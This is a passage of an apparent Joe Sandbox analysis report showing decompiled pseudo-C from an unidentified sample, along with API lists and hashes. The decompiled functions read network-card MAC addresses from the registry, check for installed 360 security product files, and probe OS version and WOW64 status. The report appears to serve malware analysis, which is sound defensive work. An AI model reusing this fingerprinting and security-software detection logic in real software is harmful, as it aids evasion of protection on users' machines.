					__imp__CoInitialize(0);
					_t45 =  &_v4132;
					__imp__CoCreateInstance(0xd44044, 0, 0x15, 0xd44004, _t45);
					if(_t45 < 0) {
						__imp__CoUninitialize();
						_v8 = 0xfffffffe;
						_t46 = 0;
					} else {
						_t48 = _v4132;
						if(_t48 != 0) {
							_t72 =  &_v4136;
							 *((intOrPtr*)( *_t48 + 0x94))(_t48,  &_v4136);
							_t76 = _v4136;
							if(_t76 != 0) {
								SetForegroundWindow(_t76);
								ShowWindow(_t76, 3);
							}
							_t51 = E00D00EBB(_t61);
							if(_t51 > 0) {
								__imp__#2(_t61);
								_v4160 = _t51;
								_v4152 = 0;
								_t55 = 8;
								_v4168 = _t55;
								_t56 = _v4132;
								_t73 =  &_v4152;
								_t72 =  &_v4168;
								 *((intOrPtr*)( *_t56 + 0xd0))(_t56,  &_v4168, _t73, _t73, _t73, _t73);
								__imp__#6(_v4160);
							}
							_t52 = _v4132;
							 *((intOrPtr*)( *_t52 + 8))(_t52);
						}
						__imp__CoUninitialize();
						_v8 = 0xfffffffe;
						goto L1;
					}
				} else {
					L1:
					_t46 = 1;
				}
				 *[fs:0x0] = _v20;
				_pop(_t75);
				_pop(_t79);
				_pop(_t62);
				return E00D0071A(_t46, _t62, _v32 ^ _t80, _t72, _t75, _t79);
			}




































                                                                                                                                                                                          0x00cc6971
                                                                                                                                                                                          0x00cc6974
                                                                                                                                                                                          0x00cc6976
                                                                                                                                                                                          0x00cc697b
                                                                                                                                                                                          0x00cc6986
                                                                                                                                                                                          0x00cc6987
                                                                                                                                                                                          0x00cc6988
                                                                                                                                                                                          0x00cc698e
                                                                                                                                                                                          0x00cc6993
                                                                                                                                                                                          0x00cc6998
                                                                                                                                                                                          0x00cc699b
                                                                                                                                                                                          0x00cc699d
                                                                                                                                                                                          0x00cc69a2
                                                                                                                                                                                          0x00cc69a3
                                                                                                                                                                                          0x00cc69a7
                                                                                                                                                                                          0x00cc69ad
                                                                                                                                                                                          0x00cc69b0
                                                                                                                                                                                          0x00cc69b5
                                                                                                                                                                                          0x00cc69cb
                                                                                                                                                                                          0x00cc69e2
                                                                                                                                                                                          0x00cc6a08
                                                                                                                                                                                          0x00cc6a12
                                                                                                                                                                                          0x00cc6a15
                                                                                                                                                                                          0x00cc6a1c
                                                                                                                                                                                          0x00cc6a22
                                                                                                                                                                                          0x00cc6a36
                                                                                                                                                                                          0x00cc6a3e
                                                                                                                                                                                          0x00cc6af8
                                                                                                                                                                                          0x00cc6afe
                                                                                                                                                                                          0x00cc6b05
                                                                                                                                                                                          0x00cc6a44
                                                                                                                                                                                          0x00cc6a44
                                                                                                                                                                                          0x00cc6a4c
                                                                                                                                                                                          0x00cc6a54
                                                                                                                                                                                          0x00cc6a5c
                                                                                                                                                                                          0x00cc6a62
                                                                                                                                                                                          0x00cc6a6a
                                                                                                                                                                                          0x00cc6a6d
                                                                                                                                                                                          0x00cc6a76
                                                                                                                                                                                          0x00cc6a76
                                                                                                                                                                                          0x00cc6a7d
                                                                                                                                                                                          0x00cc6a85
                                                                                                                                                                                          0x00cc6a88
                                                                                                                                                                                          0x00cc6a8e
                                                                                                                                                                                          0x00cc6a96
                                                                                                                                                                                          0x00cc6a9f
                                                                                                                                                                                          0x00cc6aa0
                                                                                                                                                                                          0x00cc6aa7
                                                                                                                                                                                          0x00cc6aaf
                                                                                                                                                                                          0x00cc6ab9
                                                                                                                                                                                          0x00cc6ac1
                                                                                                                                                                                          0x00cc6acd
                                                                                                                                                                                          0x00cc6acd
                                                                                                                                                                                          0x00cc6ad3
                                                                                                                                                                                          0x00cc6adc
                                                                                                                                                                                          0x00cc6adc
                                                                                                                                                                                          0x00cc6adf
                                                                                                                                                                                          0x00cc6ae5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cc6ae5
                                                                                                                                                                                          0x00cc6a0a
                                                                                                                                                                                          0x00cc6a0a
                                                                                                                                                                                          0x00cc6a0c
                                                                                                                                                                                          0x00cc6a0c
                                                                                                                                                                                          0x00cc6b0a
                                                                                                                                                                                          0x00cc6b12
                                                                                                                                                                                          0x00cc6b13
                                                                                                                                                                                          0x00cc6b14
                                                                                                                                                                                          0x00cc6b20

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CC69CB
                                                                                                                                                                                            • Part of subcall function 00CC6919: _vswprintf_s.LIBCMT ref: 00CC694C
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,Explorer,?,00000000,00000005), ref: 00CC69FF
                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CC6A1C
                                                                                                                                                                                          • CoCreateInstance.OLE32(00D44044,00000000,00000015,00D44004,?), ref: 00CC6A36
                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00CC6A6D
                                                                                                                                                                                          • ShowWindow.USER32(?,00000003), ref: 00CC6A76
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CC6A7D
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00CC6A88
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00CC6ACD
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00CC6ADF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: StringWindow$AllocCreateExecuteForegroundFreeInitializeInstanceShellShowUninitialize_memset_vswprintf_s_wcslen
                                                                                                                                                                                          • String ID: "%s"$Explorer$open
                                                                                                                                                                                          • API String ID: 1808081493-318905468
                                                                                                                                                                                          • Opcode ID: 7ac164707fd78104a7db3398c2060ac6854945e4d8d5fa762afcf2dd7138406c
                                                                                                                                                                                          • Instruction ID: 7b6483ce088d6a12774ffa0336b3e844c095b010c89d92ee6faa9d4648c400dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ac164707fd78104a7db3398c2060ac6854945e4d8d5fa762afcf2dd7138406c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04417EB1A00358AFD7209B64DD89FEE7BB8EF48740F004099F559E6290D7B49A818F71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C868E0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 153registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E00C868E0(intOrPtr _a4, int _a8) {
				int _v8;
				int _v12;
				void* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t32;
				void* _t38;
				void* _t41;
				intOrPtr _t43;
				void* _t46;
				long _t47;
				long _t48;
				long _t50;
				int _t54;
				void* _t55;
				short* _t56;
				void* _t65;
				void* _t66;
				int _t67;
				int* _t70;
				int* _t72;

				_t67 = 0;
				_t66 = 0;
				_v20 = 0;
				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L4:
					return _t32 | 0xffffffff;
				} else {
					_t32 = E00D017AD(_t55, _t63, 0, 0x200);
					_t56 = _t32;
					_t70 =  &(( &_v28)[1]);
					if(_t56 != 0) {
						__eflags = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards", 0, 0x20119,  &_v24);
						if(__eflags != 0) {
							L22:
							_push(_t56);
							E00D0092B(_t56, _t63, _t66, _t67, __eflags);
							return _v20;
						} else {
							_t63 = _v24;
							_v28 = 0x100;
							_t38 = RegEnumKeyExW(_v24, 0, _t56,  &_v28, 0, 0, 0, 0);
							__eflags = _t38;
							if(_t38 == 0) {
								do {
									_t46 = _v24;
									__eflags = _t46;
									if(_t46 == 0) {
										_t46 = 0x80000002;
									}
									_t47 = RegOpenKeyExW(_t46, _t56, 0, 0x20119,  &_v16);
									__eflags = _t47;
									if(_t47 == 0) {
										_t65 = _v16;
										_t13 =  &(_t56[2]); // 0x4
										_v12 = 1;
										_v28 = 0x200;
										_t50 = RegQueryValueExA(_t65, "ServiceName", 0,  &_v12, _t13,  &_a8);
										__eflags = _t50;
										if(_t50 == 0) {
											 *_t56 = 0x5c2e5c5c;
											_t54 = E00C86850(_t56);
											__eflags = _t65 - _t66;
											if(__eflags >= 0) {
												if(__eflags > 0) {
													L14:
													_v8 = _t54;
													_t66 = _t65;
												} else {
													__eflags = _t54 - _v8;
													if(_t54 > _v8) {
														goto L14;
													}
												}
											}
										}
										RegCloseKey(_v16);
									}
									_t63 = _v24;
									_t67 = _t67 + 1;
									_v28 = 0x100;
									_t48 = RegEnumKeyExW(_v24, _t67, _t56,  &_v28, 0, 0, 0, 0);
									__eflags = _t48;
								} while (_t48 == 0);
							}
							RegCloseKey(_v24);
							__eflags = _t66;
							if(_t66 > 0) {
								L19:
								_push(_t66);
								_t41 = E00C83BA0(_t56, 0x200, "%012I64X", _v8);
								_t72 =  &(_t70[3]);
								__eflags = _t41;
								if(__eflags != 0) {
									_t63 = _a4;
									_t43 = E00C86470(_a8, "MAC:", _a4, _t56);
									_t70 =  &(_t72[3]);
									_v20 = _t43;
									goto L22;
								} else {
									_push(_t56);
									_v20 = 0xffffffff;
									E00D0092B(_t56, _t63, _t66, _t67, __eflags);
									return _v20;
								}
							} else {
								__eflags = _v8;
								if(__eflags <= 0) {
									goto L22;
								} else {
									goto L19;
								}
							}
						}
					} else {
						SetLastError(8);
						goto L4;
					}
				}
			}





























                                                                                                                                                                                          0x00c868e6
                                                                                                                                                                                          0x00c868e9
                                                                                                                                                                                          0x00c868eb
                                                                                                                                                                                          0x00c868ef
                                                                                                                                                                                          0x00c868f7
                                                                                                                                                                                          0x00c8691a
                                                                                                                                                                                          0x00c86924
                                                                                                                                                                                          0x00c868ff
                                                                                                                                                                                          0x00c86904
                                                                                                                                                                                          0x00c86909
                                                                                                                                                                                          0x00c8690b
                                                                                                                                                                                          0x00c86910
                                                                                                                                                                                          0x00c86940
                                                                                                                                                                                          0x00c86942
                                                                                                                                                                                          0x00c86a84
                                                                                                                                                                                          0x00c86a84
                                                                                                                                                                                          0x00c86a85
                                                                                                                                                                                          0x00c86a98
                                                                                                                                                                                          0x00c86948
                                                                                                                                                                                          0x00c86948
                                                                                                                                                                                          0x00c8695e
                                                                                                                                                                                          0x00c86966
                                                                                                                                                                                          0x00c86968
                                                                                                                                                                                          0x00c8696a
                                                                                                                                                                                          0x00c86970
                                                                                                                                                                                          0x00c86970
                                                                                                                                                                                          0x00c86974
                                                                                                                                                                                          0x00c86976
                                                                                                                                                                                          0x00c86978
                                                                                                                                                                                          0x00c86978
                                                                                                                                                                                          0x00c8698b
                                                                                                                                                                                          0x00c86991
                                                                                                                                                                                          0x00c86993
                                                                                                                                                                                          0x00c8699a
                                                                                                                                                                                          0x00c8699e
                                                                                                                                                                                          0x00c869af
                                                                                                                                                                                          0x00c869b7
                                                                                                                                                                                          0x00c869bf
                                                                                                                                                                                          0x00c869c5
                                                                                                                                                                                          0x00c869c7
                                                                                                                                                                                          0x00c869cb
                                                                                                                                                                                          0x00c869d1
                                                                                                                                                                                          0x00c869d6
                                                                                                                                                                                          0x00c869d8
                                                                                                                                                                                          0x00c869da
                                                                                                                                                                                          0x00c869e2
                                                                                                                                                                                          0x00c869e2
                                                                                                                                                                                          0x00c869e6
                                                                                                                                                                                          0x00c869dc
                                                                                                                                                                                          0x00c869dc
                                                                                                                                                                                          0x00c869e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c869e0
                                                                                                                                                                                          0x00c869da
                                                                                                                                                                                          0x00c869d8
                                                                                                                                                                                          0x00c869ed
                                                                                                                                                                                          0x00c869ed
                                                                                                                                                                                          0x00c869f3
                                                                                                                                                                                          0x00c86a05
                                                                                                                                                                                          0x00c86a08
                                                                                                                                                                                          0x00c86a10
                                                                                                                                                                                          0x00c86a12
                                                                                                                                                                                          0x00c86a12
                                                                                                                                                                                          0x00c86970
                                                                                                                                                                                          0x00c86a1f
                                                                                                                                                                                          0x00c86a25
                                                                                                                                                                                          0x00c86a27
                                                                                                                                                                                          0x00c86a30
                                                                                                                                                                                          0x00c86a34
                                                                                                                                                                                          0x00c86a40
                                                                                                                                                                                          0x00c86a45
                                                                                                                                                                                          0x00c86a48
                                                                                                                                                                                          0x00c86a4a
                                                                                                                                                                                          0x00c86a69
                                                                                                                                                                                          0x00c86a78
                                                                                                                                                                                          0x00c86a7d
                                                                                                                                                                                          0x00c86a80
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86a4c
                                                                                                                                                                                          0x00c86a4c
                                                                                                                                                                                          0x00c86a4d
                                                                                                                                                                                          0x00c86a55
                                                                                                                                                                                          0x00c86a68
                                                                                                                                                                                          0x00c86a68
                                                                                                                                                                                          0x00c86a29
                                                                                                                                                                                          0x00c86a29
                                                                                                                                                                                          0x00c86a2e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86a2e
                                                                                                                                                                                          0x00c86a27
                                                                                                                                                                                          0x00c86912
                                                                                                                                                                                          0x00c86914
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86914
                                                                                                                                                                                          0x00c86910

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C86904
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,00000000,?,?,?,?,00C8659D,00000000,00002000,?,?,00C814D1), ref: 00C86914
                                                                                                                                                                                            • Part of subcall function 00D0092B: __lock.LIBCMT ref: 00D00949
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_find_block.LIBCMT ref: 00D00954
                                                                                                                                                                                            • Part of subcall function 00D0092B: ___sbh_free_block.LIBCMT ref: 00D00963
                                                                                                                                                                                            • Part of subcall function 00D0092B: RtlFreeHeap.NTDLL(00000000,?,00D58A38,0000000C,00D10CFD,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C), ref: 00D00993
                                                                                                                                                                                            • Part of subcall function 00D0092B: GetLastError.KERNEL32(?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5,?,?,?,00D10DB7,0000000D), ref: 00D009A4
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00020119,?,00000000,?,?,?,?,00C8659D,00000000,00002000,?,?,00C814D1), ref: 00C8693A
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 00C86966
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020119,?), ref: 00C8698B
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ServiceName,00000000,?,00000004,?), ref: 00C869BF
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C869ED
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 00C86A10
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C86A1F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnumErrorHeapLastOpen$AllocateFreeQueryValue___sbh_find_block___sbh_free_block__lock_malloc
                                                                                                                                                                                          • String ID: %012I64X$MAC:$SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                          • API String ID: 2979117458-1531755283
                                                                                                                                                                                          • Opcode ID: 8947f2f6acb081d825cdcdcae119120ab0c0c06d22bcbd1f7904ae95e3d049f3
                                                                                                                                                                                          • Instruction ID: 758e539ce8d3ec7472c45de85e5b715c3b885ef8d80c0bc9acc8bcc47b129463
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8947f2f6acb081d825cdcdcae119120ab0c0c06d22bcbd1f7904ae95e3d049f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2241BF71204300ABE310EF55DC86F6BBBE8EB85B58F40451DF59896291E774DA088BB7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C985F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E00C985F5(void* __ecx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				char _v1046;
				short _v1048;
				char _v2086;
				short _v2088;
				char _v3126;
				short _v3128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				void* _t42;
				void* _t69;
				void* _t79;
				void* _t82;
				signed int _t83;

				_t26 =  *0xd64070; // 0x8a9e1774
				_v8 = _t26 ^ _t83;
				_t80 = _a4;
				_v1048 = 0;
				_t69 = 0;
				E00D006A0(_a4,  &_v1046, 0, 0x40e);
				_v2088 = 0;
				E00D006A0(_t80,  &_v2086, 0, 0x40e);
				_v3128 = 0;
				E00D006A0(_t80,  &_v3126, 0, 0x40e);
				E00C983CC( &_v1048, 0x207,  *_t80,  *((intOrPtr*)( *_t80 - 8)));
				_t82 = PathFileExistsW;
				if(PathFileExistsW( &_v1048) == 0) {
					L8:
					_t42 = 0;
				} else {
					_t69 = 0x208;
					E00C8E570( &_v2088, 0x208,  &_v1048);
					_t80 = PathAppendW;
					PathAppendW( &_v2088, L"360leakfixer.exe");
					if(PathFileExistsW( &_v2088) == 0 || E00C8E2D0( &_v2088, 0) == 0) {
						E00C8E570( &_v3128, _t69,  &_v1048);
						PathAppendW( &_v3128, L"hipsver.dll");
						if(PathFileExistsW( &_v3128) == 0 || E00C8E2D0( &_v3128, 0) == 0) {
							goto L8;
						} else {
							PathAppendW( &_v1048, L"safemon\\360cactus.tpi");
							if(PathFileExistsW( &_v1048) == 0 || E00C8E2D0( &_v1048, 0) == 0) {
								goto L8;
							} else {
								_t42 = 1;
							}
						}
					} else {
						goto L8;
					}
				}
				return E00D0071A(_t42, _t69, _v8 ^ _t83, _t79, _t80, _t82);
			}



















                                                                                                                                                                                          0x00c985fe
                                                                                                                                                                                          0x00c98605
                                                                                                                                                                                          0x00c9860b
                                                                                                                                                                                          0x00c98616
                                                                                                                                                                                          0x00c9861d
                                                                                                                                                                                          0x00c98627
                                                                                                                                                                                          0x00c9862f
                                                                                                                                                                                          0x00c9863e
                                                                                                                                                                                          0x00c98646
                                                                                                                                                                                          0x00c98655
                                                                                                                                                                                          0x00c9866f
                                                                                                                                                                                          0x00c98674
                                                                                                                                                                                          0x00c98685
                                                                                                                                                                                          0x00c98750
                                                                                                                                                                                          0x00c98750
                                                                                                                                                                                          0x00c9868b
                                                                                                                                                                                          0x00c98692
                                                                                                                                                                                          0x00c9869f
                                                                                                                                                                                          0x00c986a4
                                                                                                                                                                                          0x00c986b6
                                                                                                                                                                                          0x00c986c3
                                                                                                                                                                                          0x00c986e8
                                                                                                                                                                                          0x00c986f9
                                                                                                                                                                                          0x00c98706
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9871c
                                                                                                                                                                                          0x00c98728
                                                                                                                                                                                          0x00c98735
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9874b
                                                                                                                                                                                          0x00c9874d
                                                                                                                                                                                          0x00c9874d
                                                                                                                                                                                          0x00c98735
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c986c3
                                                                                                                                                                                          0x00c98760

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C98627
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9863E
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C98655
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C98681
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,360leakfixer.exe), ref: 00C986B6
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C986BF
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,hipsver.dll), ref: 00C986F9
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C98702
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,safemon\360cactus.tpi), ref: 00C98728
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C98731
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$ExistsFile$Append_memset
                                                                                                                                                                                          • String ID: 360leakfixer.exe$hipsver.dll$safemon\360cactus.tpi
                                                                                                                                                                                          • API String ID: 3362169587-3557251664
                                                                                                                                                                                          • Opcode ID: f8c70d043e6328b786d82e8314e6d997b75ae02560d407c09959341d6cc44fdc
                                                                                                                                                                                          • Instruction ID: 57e64809de62cea6b7020822e55e1374cec8b266b5cda61798c29ab02228961e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8c70d043e6328b786d82e8314e6d997b75ae02560d407c09959341d6cc44fdc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F4110B291121DAADF10EBB4CD45FDA73EC9F49310F5048A2A604E3081EE74EB888F75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F550 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 118libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00C8F550(struct _OSVERSIONINFOW* __ebx, void* __ebp, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				char _v1042;
				char _v1044;
				char* _v1320;
				signed int _v1324;
				void _v1328;
				unsigned int _v1360;
				signed short _v1364;
				char _v1380;
				char _v1384;
				void* _v1388;
				intOrPtr _v1392;
				void* __edi;
				void* __esi;
				signed int _t45;
				_Unknown_base(*)()* _t52;
				signed int _t66;
				void* _t69;
				void* _t75;
				signed int _t77;
				signed short _t81;
				signed int _t82;
				signed int _t89;
				void* _t90;
				void* _t91;
				signed int _t99;
				signed int _t100;

				_t75 = __ebx;
				_t99 =  &_v1388;
				_t45 =  *0xd64070; // 0x8a9e1774
				_v4 = _t45 ^ _t99;
				_v1388 = _a4;
				E00D006A0(_t90,  &_v1328, 0, 0x11c);
				_v1328 = 0x11c;
				E00D006A0(_t90, __ebx, 0, 0x11c);
				_t100 = _t99 + 0x18;
				 *__ebx = 0x11c;
				GetVersionExW(__ebx);
				_t91 = GetProcAddress;
				if(__ebx->dwMajorVersion != 5) {
					L4:
					_t52 = GetProcAddress(GetModuleHandleW(L"ntdll"), "RtlGetVersion");
					if(_t52 != 0) {
						 *_t52( &_v1328);
					}
					_t91 =  *(_t75 + 8) + ( *(_t75 + 4) +  *(_t75 + 4) * 4) * 2;
					_t88 = _v1320;
					_t77 = _v1324 + _v1324 * 4;
					_t107 = _t88 + _t77 * 2 - _t91;
					if(_t88 + _t77 * 2 > _t91) {
						_t69 = memcpy(_t75,  &_v1328, 0x47 << 2);
						_t100 = _t100 + 0xc;
						_t91 = _t69;
					}
					_v1044 = 0;
					E00D006A0(_t91,  &_v1042, 0, 0x40e);
					_t100 = _t100 + 0xc;
					_t95 =  &_v1044;
					if(E00C8F450(_t75, _t91,  &_v1044, _t107) < 0) {
						L13:
						 *((intOrPtr*)(_v1388 + 4)) = 0;
						goto L14;
					} else {
						_t88 =  &_v1380;
						if(E00C8F6F0( &_v1044,  &_v1380) == 0) {
							goto L13;
						}
						_t81 = _v1364;
						_t66 = _t81 >> 0x10;
						_t82 = _t81 & 0x0000ffff;
						_t89 = _t66 + _t66 * 4;
						_t88 = _t82 + _t89 * 2;
						if(_t91 >= _t82 + _t89 * 2) {
							_t88 = _v1388;
							 *((intOrPtr*)(_v1388 + 4)) = 0;
						} else {
							 *(_t75 + 4) = _t66;
							 *(_t75 + 8) = _t82;
							 *(_t75 + 0xc) = _v1360 >> 0x10;
							 *((intOrPtr*)(_v1388 + 4)) = 1;
						}
						L14:
						return E00D0071A(1, _t75, _v4 ^ _t100, _t88, _t91, _t95);
					}
				}
				_t95 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				_v1384 = 0;
				if(_t95 == 0) {
					goto L4;
				}
				_t88 =  &_v1384;
				_push( &_v1384);
				_push(GetCurrentProcess());
				if( *_t95() == 0 || _v1392 == 0) {
					goto L4;
				} else {
					goto L13;
				}
			}






























                                                                                                                                                                                          0x00c8f550
                                                                                                                                                                                          0x00c8f550
                                                                                                                                                                                          0x00c8f556
                                                                                                                                                                                          0x00c8f55d
                                                                                                                                                                                          0x00c8f57a
                                                                                                                                                                                          0x00c8f57e
                                                                                                                                                                                          0x00c8f58b
                                                                                                                                                                                          0x00c8f593
